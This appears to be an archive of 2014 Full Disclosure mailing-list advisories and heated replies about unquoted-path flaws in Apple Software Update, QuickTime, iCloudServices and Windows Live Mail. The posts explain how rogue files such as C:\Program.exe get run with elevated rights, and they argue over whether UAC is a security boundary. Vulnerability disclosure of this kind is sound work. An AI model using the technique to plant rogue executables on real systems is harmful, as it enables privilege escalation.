This invokes the COM server {91A9E6A9-3935-4A37-AFBA-F0904B166364}
alias AppleSoftwareUpdate.ASUInstallhost, implemented in the DLL
C:\Program Files\Apple Software Update\SoftwareUpdateAdmin.Dll

This COM server runs with administrative rights and executes the
command line

C:\Program Files\Apple Software Update\SoftwareUpdate.exe -background

without properly quoted pathname, resulting in the execution of one
of the rogue programs C:\Program.exe, C:\Program Files\Apple.exe
or C:\Program Files\Apple Software.exe (on x86) resp. C:\Program.exe,
C:\Program Files.exe, C:\Program Files (x86)\Apple.exe or
C:\Program Files\Apple Software.exe (on x64) with administrative


| Note: If any element of the command string contains or might contain
| spaces, it must be enclosed in quotation marks. Otherwise, if the
| element contains a space, it will not parse correctly. For instance,
| My Program.exe starts the application properly. If you use
| My Program.exe without quotation marks, then the system attempts to
| launch My with Program.exe as its first command line argument.

Since every user account created during Windows setup has administrative
rights every user owning such an account can create the rogue program(s),
resulting in a privilege escalation.

JFTR: no, the user account control is not a security boundary!


| Same-desktop Elevation in UAC is not a security boundary and can be hijacked
| by unprivileged software that runs on the same desktop. Same-desktop
| Elevation should be considered a convenience feature, and from a security
| perspective, Protected Administrator should be considered the equivalent
| of Administrator.

Stefan Kanthak

Beginners error: Windows Live Mail 2011 runs rogue C:\Program.exe when opening associated URLs

2014-08-18 Thread Stefan Kanthak
Hi @ll,

the following command lines associated with the URL protocols of
Windows Live Mail 2011 (15.4.3538.513)

WLMail.Url.Mailto=C:\Program Files (x86)\Windows Live\Mail\wlmail.exe 
/mailurl:%1\Program Files (x86)\Windows Live\Mail\wlmail.exe 
WLMail.Url.nntp=C:\Program Files (x86)\Windows Live\Mail\wlmail.exe 
WLMail.Url.snews=C:\Program Files (x86)\Windows Live\Mail\wlmail.exe 

execute the rogue programs C:\Program.exe, C:\Program Files\Windows.exe
(on x86) resp. C:\Program Files.exe or C:\Program Files (x86)\Windows.exe
(on x64) with the credentials of the user whenever the user opens one of the
associated URLs.


| Note: If any element of the command string contains or might contain
| spaces, it must be enclosed in quotation marks. Otherwise, if the
| element contains a space, it will not parse correctly. For instance,
| My Program.exe starts the application properly. If you use
| My Program.exe without quotation marks, then the system attempts to
| launch My with Program.exe as its first command line argument.

Since every user account created during Windows setup has administrative
rights every user owning such an account can create the rogue program(s),
resulting in a privilege escalation.

JFTR: no, the user account control is not a security boundary!


| Same-desktop Elevation in UAC is not a security boundary and can be hijacked
| by unprivileged software that runs on the same desktop. Same-desktop
| Elevation should be considered a convenience feature, and from a security
| perspective, Protected Administrator should be considered the equivalent
| of Administrator.

JFTR: if you or your customers, family etc. still use Windows Live Mail 2011,
  see and upgrade
  to Windows Live Mail 2012 ASAP!

Stefan Kanthak

PS: the associations for .eml and .nws DONT show this beginners error:

WindowsLiveMail.Email.1=C:\Program Files (x86)\Windows 
Live\Mail\wlmail.exe /eml:%1
WindowsLiveMail.News.1=C:\Program Files (x86)\Windows 
Live\Mail\wlmail.exe /nws:%1

Unfortunately their argument %1 is not quoted, see above!

Beginners error: Apple's iCloudServices for Windows run rogue program C:\Program.exe (and some more)

2014-08-18 Thread Stefan Kanthak
Hi @ll,

C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe,
part of Apple's iCloudServices (see, is
configured to be started as (COM) server via SvcHost.Exe.

Unfortunately the developers of this (COM) server (and of course their QA
too) did a lousy job and let their installer create the following erroneous
registry entries with a command line that contains an unquoted pathname:

@=C:\\Program Files\\Common Files\\Apple\\Internet 

@=C:\\Program Files\\Common Files\\Apple\\Internet 

The unquoted pathname results in the execution of one of the rogue programs
C:\Program.exe, C:\Program Files\Common.exe or
C:\Program Files\Common Files\Apple\Internet.exe (on x86) resp.
C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Common.exe
or C:\Program Files (x86)\Common Files\Apple\Internet.exe (on x64) with
the rights of the logged on user.

JFTR: the other 3 registry entries created for this COM server dont show
  this beginners error and have the pathname properly quoted:

@=\C:\\Program Files\\Common Files\\Apple\\Internet 

@=\C:\\Program Files\\Common Files\\Apple\\Internet 

@=\C:\\Program Files\\Common Files\\Apple\\Internet 

Since every user account created during Windows setup has administrative
rights every user owning such an account can create the rogue program(s),
resulting in a privilege escalation.

JFTR: no, the user account control is not a security boundary!


| Same-desktop Elevation in UAC is not a security boundary and can be hijacked
| by unprivileged software that runs on the same desktop. Same-desktop
| Elevation should be considered a convenience feature, and from a security
| perspective, Protected Administrator should be considered the equivalent
| of Administrator.

JFTR: iCloudServices ships with even older outdated and vulnerable 3rd party
   (open source) libraries than iTunes, see

  - libxslt.dll
  - libxml2.dll
  - icuuc40.dll, icuin40.dll, icudt46.dll. libicuin.dll, libicuuc.dll

Stefan Kanthak

PS: the obvious and trivial fix: edit the 2 erroneous command lines and
add the missing quotes. But dont forget to fix them after every update
of Apple's crap for Windows.

Beginners error: QuickTime for Windows runs rogue program C:\Program.exe when opening associated files

2014-08-08 Thread Stefan Kanthak
| My Program.exe without quotation marks, then the system attempts to
| launch My with Program.exe as its first command line argument. You
| should always use quotation marks with arguments such as %1 that are
| expanded to strings by the Shell, because you cannot be certain that
| the string will not contain a space.

These command lines run the rogue program C:\Program.exe whenever the
user double-clicks an associated file with the credentials of the user.

Since every user account created during Windows setup has administrative
rights every user owning such an account can create the rogue program,
resulting in a privilege escalation.

JFTR: no, the user account control is not a security boundary!


| Same-desktop Elevation in UAC is not a security boundary and can be hijacked
| by unprivileged software that runs on the same desktop. Same-desktop
| Elevation should be considered a convenience feature, and from a security
| perspective, Protected Administrator should be considered the equivalent
| of Administrator.

JFTR: this bugs only exists since Microsoft masks it.
  See for this
  well-known idiosyncrasy:

| For example, consider the string c:\program files\sub dir\program name.
| This string can be interpreted in a number of ways.
| The system tries to interpret the possibilities in the following order:
| c:\program.exe files\sub dir\program name
| c:\program files\sub.exe dir\program name
| c:\program files\sub dir\program.exe name
| c:\program files\sub dir\program name.exe

  Without this kludge this beginners error would get caught upon
  the very first use of any of these command lines.

Long filenames containing spaces exist for about 20 years in Windows.
It's REALLY time that every developer and every QA engineer knows how
to handle them properly.

If you detect such silly beginners errors: report them and get them fixed.
If the vendor does not fix them: trash the trash!

Stefan Kanthak

PS: for static detection of these silly beginners errors download and

To catch all instances of this beginners error download, and, then read
and run the script SENTINEL.CMD

PPS: to fix these beginners errors for QuickTime (and iTunes too),
 resp. and
 run these scripts.
 Dont forget to rerun them after every update of QuickTime or
 iTunes ... until Apple fixes their crapware!

Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account

2014-07-31 Thread Stefan Kanthak
Joe Souza wrote:

 It is at the very least ignorant to call Microsoft's CreateProcess
 behavior braindead.

What else is it then?

 If anything it shows your complete lack of understanding of the issue.

Really? Let's see how good your understanding of the Win32 API and its
compatibility to the Win16 API is.

 The behavior of the API is not arbitrary; Microsoft has always had to
 walk the line between security and application compatibility.

And every so often they made the wrong decision!

 If Microsoft were to change behavior of CreateProcess as you suggest,
 then they would break untold apps that have been written so as to call
 the API without quoting the target executable.

Such crap deserves to break: better be safe than sorry.

 The quotes became necessary only with the advent of LFN-aware file

NTFS was LFN-aware, from its very beginning, 20+ years ago!

 and the Windows API predates the availability of LFN-aware file systems
 on Windows.

Which Windows API?

The Win32 API was introduced with Windows NT, together with the LFN-aware
NTFS file system.
It was INCOMPATIBLE to the previously used Win16 API, on source and binary
There was no CreateProcess() in the Win16 API, but WinExec().

So: what about just getting the preconditions to your arguments right?
OUCH^WPooof: ff you do, your arguments just vanish.

 If you were the developer of an operating system that millions of people
 relied upon and you were faced with the decision between tightening up
 the behavior of an API vs. breaking customer applications that people
 regularly use, what would your choice be?

I dont need to choose!
There was no compatibility to break.


 Original message 
From: Stefan Kanthak
Date:07/30/2014 3:19 AM (GMT-08:00)
To: Michael Cramer , Gynvael Coldwind
Cc: fulldisclosure , Brandon Perry ,
Subject: Re: [FD] Beginner's error: import function of Windows Mail executes 
rogue program C:\Program.exe with credentials of other

Michael Cramer wrote:

I think you're arguing semantics here.

Of course.

 Of course the specifics of how a particular program is executed
 will be different between command line and GUI-based OS'.

Is there any need for this difference you state?
BTW: what is the difference?

 Both provide the ability for non-privileged users to launch processes
 with specific, temporary Administrative access rather than their
 account having always-on Administrative access.

But only Windows' system call CreateProcess*() has the COMPLETELY
BRAINDEAD behaviour to guess or probe which executable to run!

 Whether or not a user is going to click yes to everything is completely
 irrelevant to the technical details at hand. It could be argued that
 training a user to type 'sudo' on every command could have the same effects.
 Just because *YOU* understand the difference doesn't mean there aren't
 1000 Linux users out there typing sudo for literally everything simply
 because that's how they were taught to type commands in the terminal.

You miss the point, completely.
It's not about sudo or RUNAS.EXE or UAC, its about the braindead behaviour
of CreateProcess*().

This is the culprit. Nothing else.

Without its braindead behaviour every developer or his QA would stumble
over unquoted paths the very instant they are used and poorly written
programs with such beginners errors would not be delivered to hundreds
of millions of unsuspecting users putting them at risk to run a rogue

 RE: 0.

 This was brought up on the FD mailing list towards the end of June
 ( in which discussion
 on how the Linux shell has its own quirks regarding path names and
 potential security issues. It's disingenuous to single out Windows with
 its path name handling in this context without addressing this issue
 across the board. Simply put, these types of issues are universally
 understood across many operating systems to be in the realm of
 applications themselves and NOT a fault of the platform.

Its but the fault of the platform!
CreateProcess*() is just the system call, and its the ONLY system
call available to start another process, used by ShellExecute*(),
the service manager etc. pp.

 So again, to sit here and single out Windows for its quirky pathname
 behavior is just picking fights here.

See above: you completely miss the point!

 In short, yes, Windows has a function that takes input and launches a
 path which COULD lead to unexpected behavior when passing the argument
 without quotes. But arguing that this should be on Microsoft to resolve
 within Windows just points me back towards the aforementioned link which
 says such problems should also be resolved at the OS layer for them as well.

See above: CreateProcess*() is the OS layer here!

 To address your Windows auto

Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account

2014-07-31 Thread Stefan Kanthak
Joe Souza wrote:

Stop sending HTML!

 In Win32, WinExec is merely a wrapper around CreateProcess.
 CreateProcess needs to support the same semantics that WinExec did.

It does: the Win16 API does NOT support LFNs, just SFNs. With this
precondition (which you did not take into account, again) WinExec()
supports under Win32 exact the same semantics as under Win16.


 Original message 
From: Stefan Kanthak
Date:07/30/2014 8:26 AM (GMT-08:00)
To: Joe Souza , Michael Cramer , Gynvael Coldwind
Cc: fulldisclosure , Brandon Perry ,
Subject: Re: [FD] Beginner's error: import function of Windows Mail executes 
rogue program C:\Program.exe with credentials of other

Joe Souza wrote:

 It is at the very least ignorant to call Microsoft's CreateProcess
 behavior braindead.

What else is it then?

 If anything it shows your complete lack of understanding of the issue.

Really? Let's see how good your understanding of the Win32 API and its
compatibility to the Win16 API is.

 The behavior of the API is not arbitrary; Microsoft has always had to
 walk the line between security and application compatibility.

And every so often they made the wrong decision!

 If Microsoft were to change behavior of CreateProcess as you suggest,
 then they would break untold apps that have been written so as to call
 the API without quoting the target executable.

Such crap deserves to break: better be safe than sorry.

 The quotes became necessary only with the advent of LFN-aware file

NTFS was LFN-aware, from its very beginning, 20+ years ago!

 and the Windows API predates the availability of LFN-aware file systems
 on Windows.

Which Windows API?

The Win32 API was introduced with Windows NT, together with the LFN-aware
NTFS file system.
It was INCOMPATIBLE to the previously used Win16 API, on source and binary
There was no CreateProcess() in the Win16 API, but WinExec().

So: what about just getting the preconditions to your arguments right?
OUCH^WPooof: ff you do, your arguments just vanish.

 If you were the developer of an operating system that millions of people
 relied upon and you were faced with the decision between tightening up
 the behavior of an API vs. breaking customer applications that people
 regularly use, what would your choice be?

I dont need to choose!
There was no compatibility to break.


 Original message 
From: Stefan Kanthak
Date:07/30/2014 3:19 AM (GMT-08:00)
To: Michael Cramer , Gynvael Coldwind
Cc: fulldisclosure , Brandon Perry ,
Subject: Re: [FD] Beginner's error: import function of Windows Mail executes 
rogue program C:\Program.exe with credentials of other

Michael Cramer wrote:

I think you're arguing semantics here.

Of course.

 Of course the specifics of how a particular program is executed
 will be different between command line and GUI-based OS'.

Is there any need for this difference you state?
BTW: what is the difference?

 Both provide the ability for non-privileged users to launch processes
 with specific, temporary Administrative access rather than their
 account having always-on Administrative access.

But only Windows' system call CreateProcess*() has the COMPLETELY
BRAINDEAD behaviour to guess or probe which executable to run!

 Whether or not a user is going to click yes to everything is completely
 irrelevant to the technical details at hand. It could be argued that
 training a user to type 'sudo' on every command could have the same effects.
 Just because *YOU* understand the difference doesn't mean there aren't
 1000 Linux users out there typing sudo for literally everything simply
 because that's how they were taught to type commands in the terminal.

You miss the point, completely.
It's not about sudo or RUNAS.EXE or UAC, its about the braindead behaviour
of CreateProcess*().

This is the culprit. Nothing else.

Without its braindead behaviour every developer or his QA would stumble
over unquoted paths the very instant they are used and poorly written
programs with such beginners errors would not be delivered to hundreds
of millions of unsuspecting users putting them at risk to run a rogue

 RE: 0.

 This was brought up on the FD mailing list towards the end of June
 ( in which discussion
 on how the Linux shell has its own quirks regarding path names and
 potential security issues. It's disingenuous to single out Windows with
 its path name handling in this context without addressing this issue
 across the board. Simply put, these types of issues are universally
 understood across many operating systems to be in the realm of
 applications themselves and NOT a fault of the platform.

Its but the fault of the platform!

Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account

2014-07-31 Thread Stefan Kanthak
Joe Souza wrote:

 You can blame the Mail app on Android for the HTML.

I dont: I but blame PEBKAC for the HTML or other deficiencies.

 You have illustrated below exactly the reason why CreateProcess
 needs to handle unquoted paths.  Thanks for helping me make my point.

Where did I write that CreateProcess() should guess how many parts of
the command line form the path to the application?

You still dont get the point, you dont even read what I wrote.


-Original Message-
From: Stefan Kanthak []
Sent: Wednesday, July 30, 2014 10:11 AM
To: Joe Souza; Michael Cramer; Gynvael Coldwind
Cc: fulldisclosure; Brandon Perry;
Subject: Re: [FD] Beginner's error: import function of Windows Mail executes 
rogue program C:\Program.exe with credentials of other

Joe Souza wrote:

Stop sending HTML!

 In Win32, WinExec is merely a wrapper around CreateProcess.
 CreateProcess needs to support the same semantics that WinExec did.

It does: the Win16 API does NOT support LFNs, just SFNs. With this precondition 
(which you did not take into account, again)
WinExec() supports under Win32 exact the same semantics as under Win16.


 Original message 
From: Stefan Kanthak
Date:07/30/2014 8:26 AM (GMT-08:00)
To: Joe Souza , Michael Cramer , Gynvael Coldwind
Cc: fulldisclosure , Brandon Perry ,
Subject: Re: [FD] Beginner's error: import function of Windows Mail executes 
rogue program C:\Program.exe with credentials of other

Joe Souza wrote:

 It is at the very least ignorant to call Microsoft's CreateProcess
 behavior braindead.

What else is it then?

 If anything it shows your complete lack of understanding of the issue.

Really? Let's see how good your understanding of the Win32 API and its 
compatibility to the Win16 API is.

 The behavior of the API is not arbitrary; Microsoft has always had to
 walk the line between security and application compatibility.

And every so often they made the wrong decision!

 If Microsoft were to change behavior of CreateProcess as you suggest,
 then they would break untold apps that have been written so as to call
 the API without quoting the target executable.

Such crap deserves to break: better be safe than sorry.

 The quotes became necessary only with the advent of LFN-aware file

NTFS was LFN-aware, from its very beginning, 20+ years ago!

 and the Windows API predates the availability of LFN-aware file
 systems on Windows.

Which Windows API?

The Win32 API was introduced with Windows NT, together with the LFN-aware NTFS 
file system.
It was INCOMPATIBLE to the previously used Win16 API, on source and binary 
There was no CreateProcess() in the Win16 API, but WinExec().

So: what about just getting the preconditions to your arguments right?
OUCH^WPooof: ff you do, your arguments just vanish.

 If you were the developer of an operating system that millions of
 people relied upon and you were faced with the decision between
 tightening up the behavior of an API vs. breaking customer
 applications that people regularly use, what would your choice be?

I dont need to choose!
There was no compatibility to break.


 Original message 
From: Stefan Kanthak
Date:07/30/2014 3:19 AM (GMT-08:00)
To: Michael Cramer , Gynvael Coldwind
Cc: fulldisclosure , Brandon Perry ,
Subject: Re: [FD] Beginner's error: import function of Windows Mail executes 
rogue program C:\Program.exe with credentials of other

Michael Cramer wrote:

I think you're arguing semantics here.

Of course.

 Of course the specifics of how a particular program is executed will
 be different between command line and GUI-based OS'.

Is there any need for this difference you state?
BTW: what is the difference?

 Both provide the ability for non-privileged users to launch processes
 with specific, temporary Administrative access rather than their
 account having always-on Administrative access.

But only Windows' system call CreateProcess*() has the COMPLETELY BRAINDEAD 
behaviour to guess or probe which executable to run!

 Whether or not a user is going to click yes to everything is
 completely irrelevant to the technical details at hand. It could be
 argued that training a user to type 'sudo' on every command could have the 
 same effects.
 Just because *YOU* understand the difference doesn't mean there aren't
 1000 Linux users out there typing sudo for literally everything simply
 because that's how they were taught to type commands in the terminal.

You miss the point, completely.
It's not about sudo or RUNAS.EXE or UAC, its about the braindead behaviour of 

This is the culprit. Nothing else.

Without its braindead behaviour every developer or his QA would stumble

Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account

2014-07-30 Thread Stefan Kanthak
Michael Cramer wrote:

 How is this different from any other temporary, per-process elevation system?

0. neither sudo nor nor the OS where these programs
   typically run have a CreateProcess*() system call which guesses which
   executable it should run in case of a command line with embedded spaces.

   Do you expect that your command line executes sudo
   in the absence of a file sudo or sudo.exe?

1. if you omit sudo from the command line, there is no elevation, not even
   an attempt for an elevation.

   On Windows, you dont need to use sudo, you just open for example
   REGEDIT.EXE or make-me-a-sandwich.reg: if you do this in a standard
   user account REGEDIT.EXE will run with standard user rights, without
   any prompt for elevation. But if you do this in an administrator account
   (except the builtin Administrator), Windows prompts for consent.

   And if you use one of the 70 Windows programs which Microsoft in their
   very finite wisdom granted auto-elevation, you wont see any elevation
   prompt at all!

2. on *x, your user account is an UNPRIVILEGED user account, and you have
   to use sudo explictly.

   On Windows, all user accounts created during setup are administrator
   accounts which show the above mentioned behaviour.

Is this enough of a difference?

 Sent from my Surface Pro 3

I don't need any advertising!


 From: Stefan Kanthak
 Sent: ?Monday?, ?July? ?28?, ?2014 ?06?:?08
 To: Gynvael Coldwind
 Cc: fulldisclosure, Brandon Perry,
 Gynvael Coldwind wrote:
 So reading the links you provided I semi-agree with you. I think the
 problem boils down to this part of your initial e-mail:
 PS: yes, it needs administrative privileges to write C:\Program.exe.
BUT: all the user account(s) created during Windows setup have
administrative privileges.
 My point was (and it still stands) that if you have admin access, this
 isn't a privilege escalation, as there is no escalation part here.
 If only Microsoft would educate its users to exercise STRICT user
 separation and use different accounts for administration and daily work.
 This is where and why UAC chimes in (which answers your question below):
 Joe Average uses the administrative account created during Windows setup,
 but UAC strips the administrator rights.
 Microsoft sells UAC as Joe Average works with standard user rights
 or Joe Average is not an administrator any more, neglecting that Joe
 will happily approve almost every request for administrative rights (or
 isnt asked at all when one of the about 70 Windows executables which are
 exempt from the elevation prompt are auto-elevated).
 The links you provided use different wording, e.g.
 To exploit the vulnerability addressed by this update, attacker must
 have permission to create a new file at the root of the system drive.
 This makes of course more sense, though as I did mention above, it
 does seem to require deliberate action from the administrator to
 actually allow a non-admin user the WD (add file to directory)
 privilege on C:\, which is rather rare I would say.
 This argument holds as long as strict user separation is exercised.
 But with UAC, Joe Average is both user and administrator, and isnt
 really aware of his split personality.
 That being said, after thinking about it again I do see your point,
 which I interpret at: even if an administrator grants all users WD/AD
 on C:\, there should be no reason for him to worry, as there is no
 reason to suspect files placed in C:\ are going to auto-execute on
 certain events*.
 * let's leave autoexec.bat/config.sys out of this, as that branch of
 Windows is long dead and supported only FAT anyway
 So let me change my initial e-mail to: Congratz on finding the bug :)
 (BTW not sure why did you bring UAC into the discussion - did I miss
 something? or was it just an argument you've heard before and wanted
 to reply to it preventively?)
 On Fri, Jul 25, 2014 at 2:50 PM, Stefan Kanthak 
 Gynvael Coldwind wrote:

 Well it was discussed a couple of times recently on FD that this is a bug,
 but it's not a privilege escalation.
 If you are admin (and you did mention that it's a prerequisite) you can
 execute code as other users anyway - so there's no *escalation* here.

 Therefore it's not a security bug (unless you are using a super old version
 of Windows with incorrect ACLs on c:\, which sounds like a bug in itself),
 just a normal bug.
 Not sure if FD is the right place for non-security bugs tbh.

 If these bugs were no security bugs: why does Microsoft then publish fixes
 for (at least some of) them via MSRC bulletins and Windows Update

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